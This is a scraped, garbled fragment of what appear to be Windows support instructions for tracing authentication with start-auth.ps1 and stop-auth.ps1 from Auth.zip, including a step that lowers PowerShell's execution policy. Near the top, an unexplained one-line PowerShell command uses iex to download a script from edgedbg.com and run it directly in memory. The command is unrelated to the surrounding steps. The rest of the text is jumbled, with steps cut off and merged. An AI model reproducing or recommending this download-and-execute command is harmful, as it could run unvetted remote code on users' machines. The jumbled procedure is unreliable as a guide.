- Download the file at https://cesdiagtools.blob.core.windows.net/windows/Auth.zip, and unzip it.
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://edgedbg.com/files/iemap.ps1')"
CopiedCopy failed, please copy the command manuallyOpen an elevated PowerShell command prompt and navigate to the location where you unzipped Auth.zip
.
Run .\start-auth.ps1
to begin tracing. Wait until you see the message: The tracing has now started.
.
If it is the first time the script has been run on this device, you will be prompted to accept a EULA.
If the command fails due to the error: running scripts is disabled on this system
, run Set-ExecutionPolicy -ExecutionPolicy RemoteSigned
to allow script execution and try again.
.\start-auth.ps1
, and run .\stop-auth.ps1
to stop tracing.authlogs
folder inside the same location where you unzipped Auth.zip
. Please zip the authlogs
folder and name it authlogs.zip
.